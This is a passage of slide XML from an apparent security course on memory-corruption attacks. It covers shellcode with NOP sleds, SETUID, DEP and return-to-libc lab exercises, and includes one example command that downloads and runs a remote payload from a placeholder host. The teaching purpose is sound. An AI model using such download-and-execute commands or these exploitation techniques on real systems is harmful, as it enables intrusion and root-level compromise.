                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108946" y="185343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132130" y="255959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142964" y="295967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153263" y="338920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163005" y="384674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172166" y="433086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="484013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188656" y="537313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195994" y="593310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202553" y="650459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208473" y="710019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213677" y="771381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218143" y="834400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221847" y="898935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224767" y="964843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226881" y="1031981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228166" y="1100205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228456" y="1146500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228525" y="1140799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228524" y="1100205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228166" y="1043055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226881" y="974831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224767" y="907694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221847" y="841786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218143" y="777251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213677" y="714231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208473" y="652870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202500" y="592843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195940" y="535694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188656" y="480164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="426864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172166" y="375937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163005" y="327525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153263" y="281771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142964" y="238818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132130" y="198809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120783" y="161887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96641" y="97874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90863" y="85725"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="2289175" w="228600">
                  <a:moveTo>
                    <a:pt x="57150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="21611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90863" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83892" y="71068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70721" y="47921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="285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g24e5311e72c_0_522"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8534399" y="3157536"/>
              <a:ext cx="228600" cy="1148079"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1148079" w="228600">
                  <a:moveTo>
                    <a:pt x="228525" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="227623" y="75181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225731" y="148925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222882" y="221075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219108" y="291474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214442" y="359966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208917" y="426394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202566" y="490602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195422" y="552432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187517" y="611729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178884" y="668335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169557" y="722094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159567" y="772850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148948" y="820445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137733" y="864723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125955" y="905528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113645" y="942702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87565" y="1005534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59756" y="1051965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30480" y="1080742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1090613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1147763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1945" y="1147763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3891" y="1147641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49995" y="1120887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77771" y="1081328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103941" y="1025673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128272" y="955130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139674" y="914654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150529" y="870910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160806" y="824049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170476" y="774222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179510" y="721581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187880" y="666276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195554" y="608459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202505" y="548280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208702" y="485892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214116" y="421445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218719" y="355091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222480" y="286981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225371" y="217265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227361" y="146096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228399" y="75181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228525" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000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g24e5311e72c_0_522"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8534399" y="2016738"/>
              <a:ext cx="228600" cy="2289175"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2289175" w="228600">
                  <a:moveTo>
                    <a:pt x="228600" y="1169373"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="228166" y="1100205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226881" y="1031980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224767" y="964843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221847" y="898935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218143" y="834400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213677" y="771380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208474" y="710019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202554" y="650459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195940" y="592843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188656" y="537313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="484013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172166" y="433086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163005" y="384674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153263" y="338920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142964" y="295967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132130" y="255959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120783" y="219036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96641" y="155023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70721" y="105071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="85724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="114299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="28574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83892" y="71068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108946" y="128194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132130" y="198809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142964" y="238818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153263" y="281771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163005" y="327525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172166" y="375937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="426865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188656" y="480164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195940" y="535694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202554" y="593310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208473" y="652870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213677" y="714232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218143" y="777251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221847" y="841786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224767" y="907694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226881" y="974831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228166" y="1043056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228599" y="1112224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="1169373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228113" y="1242960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226675" y="1315276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224314" y="1386173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221060" y="1455505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216945" y="1523123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211998" y="1588880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206249" y="1652629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199729" y="1714222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192467" y="1773512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184493" y="1830351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175838" y="1884592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166532" y="1936087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156605" y="1984689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146087" y="2030250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135008" y="2072623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123398" y="2111660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98707" y="2179138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72255" y="2231504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44282" y="2267578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2288561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2231411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15374" y="2228917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30480" y="2221540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59756" y="2192763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87565" y="2146331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113645" y="2083500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125955" y="2046325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137733" y="2005521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148948" y="1961243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159567" y="1913648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169557" y="1862892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178884" y="1809133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187517" y="1752527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195422" y="1693230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202566" y="1631400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208917" y="1567192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214442" y="1500764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219108" y="1432272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222882" y="1361873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225731" y="1289723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227623" y="1215979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228525" y="1140798"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:srgbClr val="0AD4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4e5311e72c_0_538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Exercise: memcor/readData2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659" name="Google Shape;659;g24e5311e72c_0_53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Objective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Insert shellcode into program and overwrite return address to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>point to shellcode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Increase your odds of success by using a NOP sled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Procedure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Modify the python script to include a NOP sled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Guess a few different addresses until your exploit is successful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Hints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The stack layout and addresses should be very similar to the last program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Use GDB to help you guess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Use a larger NOP sled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4e5311e72c_0_544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Environment Variables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="666" name="Google Shape;666;g24e5311e72c_0_54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Environment variables are variables inherited by a program from its execution environment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Used to reference install directories, profile settings, etc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Allocated on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> (see stack layout fig)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View values of environment variables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env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echo $[variable]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echo $PATH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export $[variable]=[value]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Export your shellcode as an environment variable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export shellcode=$(cat exploit.txt)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echo $shellcode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Try it on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readData2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4e5311e72c_0_550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Congratulations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="Google Shape;673;g24e5311e72c_0_55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You now understand the state of the art exploitation techniques*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i="1" lang="en-US"/>
              <a:t>If we were in the 90’s &amp; 00’s *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4e5311e72c_0_556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SETUID explained</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="Google Shape;680;g24e5311e72c_0_556"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="465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Set the User ID upon execution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Enables users to run executable with the permissions of the executable owner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Used for tasks that temporarily require higher (e.g. root) privileges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ping, sudo, passwd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Example use case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All users need to write to the same file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Users cannot modify what is written by other users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Root creates and owns the file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Root creates a SETUID program to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> users to limitedly modify the file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$ man passwd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Why do we care?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If a SETUID program has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, we may be able to execute code as root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4e5311e72c_0_562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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: memcor/setuidDemo/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="Google Shape;687;g24e5311e72c_0_56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Objective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Observe and understand the use of SETUID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Procedure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Observe the real and effective UIDs of normal user and root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$ id root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$ id $(whoami)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$ sudo id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$ id $(sudo whoami)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Set effective user to root and observe program behavior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$ ls -l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$ ./setuidDemo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Review makefile and source code to explain how to use SETUID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e5311e72c_0_12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Background</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;129;g24e5311e72c_0_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vulnerability is a flaw in a system that can be exploited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Memory corruption attacks (e.g. buffer overflows) are a type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> commonly found in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There are many vulnerabilities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https://nvd.nist.gov/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https://cve.mitre.org/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24e5311e72c_0_568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Execution Prevention</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Google Shape;694;g24e5311e72c_0_56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Data Execution Prevention (DEP) is a security feature in operating systems to prevent memory from being executed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Memory is marked either writable or executable, but not both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Hardware enforced (for speed)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DEP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>nullifies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> our previous exploits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The stack is a data segment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We can still place executable shellcode on the stack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But the processor will refuse to execute any instructions in the stack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Exploit results in a memory access violation (segmentation fault)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Enable or disable this protection for a program at compile time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Do not allow stack to be executable (default)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gcc -z noexecstack -o [program] [source]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Allow stack to be executable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gcc -z execstack -o [program] [source]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4e5311e72c_0_574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memcor/readData3/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="Google Shape;701;g24e5311e72c_0_57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Objective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Observe the effect of DEP on our previously successful attack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Procedure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Compile program with DEP enabled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DEP is enabled by default on GCC compiler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remove “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-z execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>” flag from makefile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Attempt previous exploits from readData1 or readData3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Show DEP enabled and disabled exploits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4e5311e72c_0_580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Return-to-libc attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Google Shape;708;g24e5311e72c_0_58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While we may not be able to insert our own code, could we use the code that already exists in the program?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Think standard libraries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Many programs include the standard C libraries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&lt;stdlib.h&gt;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&lt;stdio.h&gt;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There are many useful functions defined in these libraries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system()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exit()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mprotect()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Instead of forcing the program to return into our shellcode, we will force it to return to other functions in the C library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4e5311e72c_0_586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System(command)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715" name="Google Shape;715;g24e5311e72c_0_58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Definition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int system(const char* command);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Executes the command pointed to by the string command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Examples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system(“mkdir tmp”)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Creates a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>directory named “tmp”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system(“/bin/sh”); or system(“bash”);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Spawn a shell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system(“wget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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http://www.xkcd.com/comic.jpg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download the comic of the day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system(“mkdir tmp, mv file.bin ./tmp”)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Advanced examples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system(“wget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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www.*.com/payload.bin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; chmod u+x payload.bin; ./payload.bin”);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Could use IP instead of www.*.com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24e5311e72c_0_592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Calling system()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="722" name="Google Shape;722;g24e5311e72c_0_59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can call system() in a buffer overflow by overwriting the return address with the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address of system</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t> in libC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> (i.e. returning to libC)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Our exploit must make the stack look as if system() was legitimately called since system() relies on data from the stack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Therefore we must also provide an argument to system() on the stack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The argument is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> of the string holding our command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Char * command = “mkdir tmp”;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System(command);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4e5311e72c_0_598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Before and after ret2libc attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="729" name="Google Shape;729;g24e5311e72c_0_598"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1354325"/>
            <a:ext cx="10515600" cy="58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Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> myFunction() forces a return into system(“command”)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="730" name="Google Shape;730;g24e5311e72c_0_598"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3962398" y="2012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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1392550"/>
              </a:tblGrid>
              <a:tr h="206375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="109220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Stack (Before)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4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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="318770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E46C0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&amp;fileName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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="318770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saved EIP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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="318770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saved EBP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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="234950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filePointer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53375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="276860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dataBuffer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53375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="276860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dataBuffer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53375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="276860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dataBuffer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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="276860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dataBuffer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2575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="276860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dataBuffer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64150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="360680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 Library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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="731" name="Google Shape;731;g24e5311e72c_0_598"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886648" y="2115628"/>
            <a:ext cx="8643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76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0xfffffffc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64160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2" name="Google Shape;732;g24e5311e72c_0_598"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2677064" y="5134707"/>
            <a:ext cx="11994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Hint address-&gt;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3" name="Google Shape;733;g24e5311e72c_0_598"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2844731" y="5765772"/>
            <a:ext cx="8643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92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0x00000000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34" name="Google Shape;734;g24e5311e72c_0_598"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7448550" y="2012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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1842775"/>
              </a:tblGrid>
              <a:tr h="206375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="375920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Stack (After)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5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command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292100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5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Command Address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E46C0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AAAA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250190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System() Address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AAAA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AAAA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5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AAAA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5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AAAA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AAAA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AAAA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AAAA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64150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="585470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 Library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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="Google Shape;735;g24e5311e72c_0_598"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6515673" y="2115654"/>
            <a:ext cx="864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9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0xfffffffc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64160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6" name="Google Shape;736;g24e5311e72c_0_598"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473756" y="5739745"/>
            <a:ext cx="8643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92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0x00000000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37" name="Google Shape;737;g24e5311e72c_0_598"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
